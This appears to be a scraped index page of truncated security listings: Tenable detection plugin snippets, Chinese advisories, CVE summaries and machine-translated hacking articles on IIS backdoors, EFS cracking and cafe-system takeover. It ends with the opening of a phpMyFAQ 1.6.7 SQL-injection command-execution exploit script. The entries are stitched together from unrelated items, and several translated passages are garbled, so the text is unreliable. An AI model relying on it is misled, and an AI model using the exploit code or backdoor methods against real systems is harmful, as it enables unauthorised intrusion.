Avocent KVM Over IP Switch Detection

The remote host is an Avocent KVM over IP switch that provides for control of connected servers and devices. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid29923; scriptversion"1.12"; scriptnameenglish:"Avocent KVM Over IP Switch Detection"; scriptsummaryenglish:"Loo...

Microsoft Windows FTP客户端多个远程溢出漏洞

Microsoft Windows是微软发布的非常流行的操作系统。 Windows系统自带的FTP客户端实现上存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制客户端。 Windows操作系统所捆绑的FTP客户端没有正确地验证mget、dir、user、password、ls等命令，如果用户使用FTP客户端连接到了FTP服务器上带有超长文件夹名或文件名的目录并发布了上述命令的话，就可以触发缓冲区溢出，导致拒绝服务或执行任意指令。但这个漏洞较难利用，因为需要社会工程学且必须以有漏洞命令参数的形式注入shellcode。 Microsoft Windows XP Microsoft Windo...

HP OVCM/Radia Notify Daemon Detection

The remote service is an HP OVCM/Radia Notify Daemon, a component of an endpoint management solution. The presence of this service typically indicates the host is a managed device. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid27627; scriptversion"1.12";...

Firebird process_packet() Remote Stack Overflow Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Firebird SQL server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the database service fbserver.exe, which binds to TCP port 3050. When processing a...

Magic magiclink-vulnerability warning-the black bar safety net

Magic control MagicLink1. 4 remote control software Version 1.4 update 1. Using a more complex encryption algorithm, the encrypted message information. 2. You can set the Message ID to make the connection more secure,1.4the previous Server version, the message identity is set toCMJSPY2INFO 1....

NetSupport NSM / NSS Initial Connection Setup Configuration Exchange Remote Overflow

NetSupport Manager NSM, a multi-platform remote control application, is installed on the remote host. According to its version, the NetSupport Manager client component on the remote host fails to properly validate input during the initial client connection sequence. An unauthenticated, remote...

NetSupport Manager Client Spoofing Remote Authentication Bypass

NetSupport Manager NSM, a multi-platform remote control application, is installed on the remote host. According to its version, the NetSupport Manager client component on the remote host does not properly handle authentication sessions. A remote attacker may be able to leverage this issue to pose...

Tencent QQ scene vulnerability to the hack of the law-vulnerability and early warning-the black bar safety net

According to analysys international released the 2 0 0 7 in the first 2 quarters of China im market quarterly monitoring report shows, Chinese active IM software account has reached 3. 7 6 million, which has 2. 9 million active user accounts for Tencent QQ is well deserved IM the king. But did yo...

Timbuktu Detection (UDP)

The remote service is the UDP port for Timbuktu, a remote control software application for Windows and Mac OS X. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid25953; scriptversion"1.10"; scriptcvsdate"Date: 2019/11/22"; scriptnameenglish:"Timbuktu Detection UDP";...

Motorola Timbuktu Pro目录遍历漏洞

BUGTRAQ ID: 25453 CVECAN ID: CVE-2007-4220 Motorola的Timbuktu Pro是一款远程控制软件，允许远程访问计算机桌面。 Timbuktu在处理文件名和目录时存在漏洞，远程攻击者可能利用这些漏洞非授权访问文件。 Timbuktu在处理Send请求时没有正确地检查目录遍历序列，如果在请求中包含了../../../之类序列的话，攻击者就可以向预期位置之外写入内容；此外，如果文件已存在的话，就会以新文件名创建文件，但如果在传输完成之前断开了连接，Timbuktu就会删除最初所指定的文件名。 Motorola Timbuktu Pro for...

Crack Windows System EFS encrypted file of a try-vulnerability warning-the black bar safety net

EFSEncrypting File System, Encrypting File Systemencryption is based on the NTFS disk art encryption technology. EFS encryption is based on Public Key Policies. Using EFS to encrypt a file or folder, the system will first generate a pseudo-random number consisting of a FEKFile Encryption Key file...

Real IIS always the back door decryption-bug warning-the black bar safety net

IIS is more popular in the www server, set the undue vulnerability on the lot. The invasion of the iis server after leaving the back door, since you can always control. Generally the backdoor is open a special Port to monitor, such as a nc,ntlm,rnc, etc. are based on a class telnet mode on the...

Crlf injection

Multiple CRLF injection vulnerabilities in 1 xmms-thing 1.0, 2 XMMS Remote Control Script 1.07, 3 Disrok 1.0, 4 a2x 0.0.1, 5 Another xmms-info script 1.0, 6 XChat-XMMS 0.8.1, and other unspecified scripts for XChat allow user-assisted remote attackers to execute arbitrary IRC commands via CRLF...

CVE-2007-4406

ircu 2.10.12.01 through 2.10.12.04 does not remove ops privilege after a join from a server with an older timestamp TS, which allows remote attackers to gain control of a channel during a split...

CVE-2007-4397

Multiple CRLF injection vulnerabilities in 1 xmms-thing 1.0, 2 XMMS Remote Control Script 1.07, 3 Disrok 1.0, 4 a2x 0.0.1, 5 Another xmms-info script 1.0, 6 XChat-XMMS 0.8.1, and other unspecified scripts for XChat allow user-assisted remote attackers to execute arbitrary IRC commands via CRLF...

Further understanding of USB Key security vulnerabilities-vulnerability warning-the black bar safety net

1, as long as the digital certificate and private key stored in the computer medium, or may be read into memory, and then are unsafe. For example, China merchants Bank, the hard disk version of the digital certificate is unsafe. Because of its private key and the digital certificate has been Troj...

Microsoft Windows Secure Channel integer underflow

Overview A vulnerability in Microsoft Windows Secure Channel security package may lead to execution of arbitrary code. Description Microsoft Windows Secure Channel Schannel security package implements standard network authentication protocols Secure Sockets Layer SSL and Transport Layer Security...

The use of Vientiane to control the entire cafe-vulnerability warning-the black bar safety net

In today's information world, the software is endless, believe Vientiane cafe management system this something everyone is of the left ear to listen to into the right ear to listen out of the bar,what? Haven't you heard? I faint, that you must be lying to me, since you know how to enter here then...

Security Best Practice: Domains Block List Protection - Blocking LogMeIn

LogMeIn is a remote control application that provides access to any Windows PC from anywhere in the world. It only requires a computer connected to the Internet. The user can remotely access a target computer and have a full desktop view and complete control of everything on it, including: Remote...

phpMyFAQ 1.6.7 - SQL Injection Command Execution

phpMyFAQ 1.6.7 - SQL Injection Command Execution !/usr/bin/php5-cgi -q " localhost:4001 [email protected] / function doupload$baseurl, $proxy, $cmd $fp = fopen"kebab.php", "w"; if!$fp die"Cannot open file for writing"; $code = "Un1q" . $cmd . ""; fwrite$fp, $code; fclose$fp; $sendvars"aktion"...